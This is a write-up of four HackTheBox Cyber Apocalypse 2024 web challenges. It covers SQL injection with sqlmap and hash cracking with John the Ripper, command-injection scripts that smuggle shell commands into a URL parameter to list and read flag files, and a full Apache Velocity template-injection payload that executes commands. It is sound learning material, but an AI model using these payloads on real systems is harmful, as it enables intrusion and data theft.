# HackTheBox Cyber Apocalypse 2024 CTF

## INTRODUCTION

In the realm of cybersecurity challenges, I took part in the HackTheBox Cyber Apocalypse 2024 CTF. Exhausted but determined, I decided to write up my experiences tackling some web challenges. Despite feeling worn out, I wanted to share my journey with others, hoping to shed light on the solutions I discovered amidst the digital chaos.

## WEB

### 1. Flag Command

![image](https://hackmd.io/_uploads/SkCkcEgAp.png)

When we launched our instance, we stumbled upon a webpage featuring a cool web terminal where we could input commands.

![image](https://hackmd.io/_uploads/Hy52zBlC6.png)

Curiosity piqued, I peeked into the **page source** and discovered some **JavaScript files**. I grabbed them with **wget** and started examining them one by one.

![image](https://hackmd.io/_uploads/BkmnqVeAa.png)

The first file, **main.js**, caught my attention. It was making a **POST** request to an API endpoint called **'api/monitor'** with a payload named **'command'**. Towards the end of the script, I noticed it was fetching additional data by sending a **GET** request to another API endpoint named **'/api/options'**.

![image](https://hackmd.io/_uploads/BkrToNxR6.png)

![image](https://hackmd.io/_uploads/BJgzs4l0a.png)

Excited to explore further, I decided to send a request to the **'/api/options'** endpoint using **curl**. To my amazement, it returned a list of commands, possibly meant for use on the other endpoint we had discovered. One particular command, labelled '**secret**', seemed intriguing.

![image](https://hackmd.io/_uploads/HkdvoNlAT.png)

Without hesitation, I used curl again to send a POST request to the '/api/monitor' endpoint, this time with the command set to **'HEAD NORTH'**. To my delight, it responded with a message congratulating me for escaping death. (Apparently, this challenge was designed as a game where we had to make choices to avoid danger.)
![image](https://hackmd.io/_uploads/H1qilHeR6.png)

Skipping the other options, this time I tried sending a request with the command set to the value of `secret`. And voilà! We got the flag, and that was the end of the challenge.

![image](https://hackmd.io/_uploads/HJxezHxAT.png)

### 2. KORP Terminal

![image](https://hackmd.io/_uploads/HybIBSx0T.png)

In this challenge we were required to infiltrate the KORP™ terminal and gain access to the Legionaries' privileged information. Launching the instance, we get a webpage with a login form.

![image](https://hackmd.io/_uploads/HyepUSl0p.png)

Trying a simple SQL injection payload returned an error as JSON, which suggested the application was susceptible to SQL injection.

![image](https://hackmd.io/_uploads/HyRsLHgC6.png)

![image](https://hackmd.io/_uploads/SyfS8rxRT.png)

I launched Burp Suite, intercepted the request made during the login process, and saved it to a file, **burp.txt**, to be used with sqlmap to exploit the SQL injection vulnerability.

![image](https://hackmd.io/_uploads/ry0FPBxCa.png)

Then I launched sqlmap.

![image](https://hackmd.io/_uploads/ByNgKSxAa.png)

sqlmap confirmed the application was vulnerable to three SQL injection types: boolean-based blind, error-based and time-based blind.

![image](https://hackmd.io/_uploads/ByoZqrlR6.png)

I adjusted the command to enumerate things step by step, starting with the databases, then the tables, and finally dumping the tables.

![image](https://hackmd.io/_uploads/r1-scrgAp.png)

![image](https://hackmd.io/_uploads/HJM_9rl0T.png)

Tables

![image](https://hackmd.io/_uploads/SJqJjSxA6.png)

![image](https://hackmd.io/_uploads/H1XZjHxAa.png)

Dumping users

![image](https://hackmd.io/_uploads/B1rrjSeR6.png)

![image](https://hackmd.io/_uploads/ry6voHg06.png)

The dumped users table contained password hashes produced by bcrypt (the Blowfish-based hashing scheme). It was time to crack the hashes, and our favourite tool, John the Ripper, was the option: I saved the hash to a file and started cracking it with john.
![image](https://hackmd.io/_uploads/HkRRnSgRp.png)

Using the obtained username and password to log in, we get a page with our flag, and that was the end.

![image](https://hackmd.io/_uploads/HysbTHxCa.png)

### 3. TimeKORP

![image](https://hackmd.io/_uploads/B1_7ZIlCp.png)

Upon launching the instance, we encountered a webpage displaying the time in a specific format, as shown in the URL. Unlike before, this time we were provided with the source code, prompting us to delve into its details.

![image](https://hackmd.io/_uploads/B1WWZUgAp.png)

As we reviewed the source code, we stumbled upon the TimeModel, which executed a system command built from the `$format` variable without any input sanitization. This hinted at a potential command injection vulnerability.

**OS command injection** is also known as shell injection. It allows an attacker to execute operating system (OS) commands on the server that is running an application, and typically to fully compromise the application and its data.

![image](https://hackmd.io/_uploads/BJOCMLgCa.png)

Our investigation led us to the TimeController, where we found that the `format` parameter was extracted from the URL and assigned to a variable named `$format`.

![image](https://hackmd.io/_uploads/r1ekm8eCa.png)

With the vulnerability identified, our next step was to attempt exploitation. We employed a technique we learned from John Hammond, using a Python script to exploit the command injection. I crafted a script that sets the `format` parameter in the URL to a payload that lists anything matching "flag". Upon executing it, we successfully retrieved the flag, demonstrating the effectiveness of the command injection exploit.
```python
#!/usr/bin/env python
import requests

# challenge instance URL
url = "http://94.237.54.161:52856/"

# the format query parameter reaches the shell unsanitised
r = requests.get(
    url,
    params={
        "format": "'; ls /flag* #",
    },
)
print(r.text)
```

![image](https://hackmd.io/_uploads/SJJwrUxAT.png)

By modifying the Python script to read the flag, we obtained the desired flag, marking the successful completion of the challenge.

```python
#!/usr/bin/env python
import requests

# challenge instance URL
url = "http://94.237.54.161:52856/"

r = requests.get(
    url,
    params={
        "format": "'; cat /flag* #",
    },
)
print(r.text)
```

![image](https://hackmd.io/_uploads/BkIhSUxRp.png)

### 4. Labyrinth Linguist

![image](https://hackmd.io/_uploads/Sku-FLeCT.png)

In this challenge we were again given an instance and the source code. Launching the instance, we see a page where we enter text and it gets displayed in a certain format.

![image](https://hackmd.io/_uploads/H1hZqUxRT.png)

Reviewing the source code, we see it is a Java application that uses the Apache Velocity template engine, so the application might be vulnerable to template injection. Paying closer attention to the source, I noticed it is indeed vulnerable: user input is injected directly into the template. The **readFileToString** method reads a template file and inserts the untrusted `textString` parameter into it using **line = line.replace("TEXT", replacement)**.
This means any Velocity template directives within `textString` will be processed as code when the template is rendered.

![image](https://hackmd.io/_uploads/r1heiLlRp.png)

While looking for an exploit, I came across a LinkedIn post that explains [Apache Velocity template injection](https://www.linkedin.com/pulse/apache-velocity-server-side-template-injection-marjan-sterjev/) and gives the following payload:

```velocity
#set($s="")
#set($stringClass=$s.getClass())
#set($stringBuilderClass=$stringClass.forName("java.lang.StringBuilder"))
#set($inputStreamClass=$stringClass.forName("java.io.InputStream"))
#set($readerClass=$stringClass.forName("java.io.Reader"))
#set($inputStreamReaderClass=$stringClass.forName("java.io.InputStreamReader"))
#set($bufferedReaderClass=$stringClass.forName("java.io.BufferedReader"))
#set($collectorsClass=$stringClass.forName("java.util.stream.Collectors"))
#set($systemClass=$stringClass.forName("java.lang.System"))
#set($stringBuilderConstructor=$stringBuilderClass.getConstructor())
#set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass))
#set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass))
#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())
#set($process=$runtime.exec("<command>"))
#set($null=$process.waitFor())
#set($inputStream=$process.getInputStream())
#set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream))
#set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader))
#set($stringBuilder=$stringBuilderConstructor.newInstance())
#set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator())))
$output
```

To use this payload I intercepted the traffic with Burp Suite and sent requests to execute commands. Listing the current directory, we see no flag.
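The difference between splicing input into the template source and binding it as a variable, as an added example that is not the challenge's Java: Python's standard-library `string.Template` stands in for Velocity here, so it can only show a directive reading a context value rather than executing code, but the `replace("TEXT", ...)` pattern and its fix are the same. The template strings and the context are constructed for the example.

```python
from string import Template

# Constructed stand-in for the challenge's template file (the real file is not
# on the page). string.Template only understands $name references, so a "leak"
# here is a context value being read, not code execution as in Velocity.
TEMPLATE_SOURCE = "<p>TEXT</p>"        # placeholder spliced in before rendering
SAFE_TEMPLATE_SOURCE = "<p>$text</p>"  # a real variable bound at render time

# Constructed server-side context that the renderer can see.
CONTEXT = {"secret": "value-the-user-must-never-see"}


def render_unsafe(user_text: str) -> str:
    """Mirrors line.replace("TEXT", replacement): the input becomes template source.

    Whatever directives user_text contains are parsed and evaluated by the engine.
    """
    source = TEMPLATE_SOURCE.replace("TEXT", user_text)
    return Template(source).safe_substitute(CONTEXT)


def render_safe(user_text: str) -> str:
    """Bind the input as a variable; the engine never parses it as template code."""
    return Template(SAFE_TEMPLATE_SOURCE).safe_substitute(CONTEXT, text=user_text)
```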
![Screenshot from 2024-03-14 14-54-08](https://hackmd.io/_uploads/HyKxmpe0p.png)

Trying the root directory, we see the flag file.

![Screenshot from 2024-03-14 14-54-32](https://hackmd.io/_uploads/HyR7Q6x06.png)

Then we were able to read the flag.

![Screenshot from 2024-03-14 14-55-10](https://hackmd.io/_uploads/BknNXagCT.png)

## CONCLUSION

Feeling a bit fatigued, I managed to solve only a handful of challenges during the HackTheBox Cyber Apocalypse 2024 CTF. I hope any mistakes will be forgiven as I share my solutions for the challenges I tackled.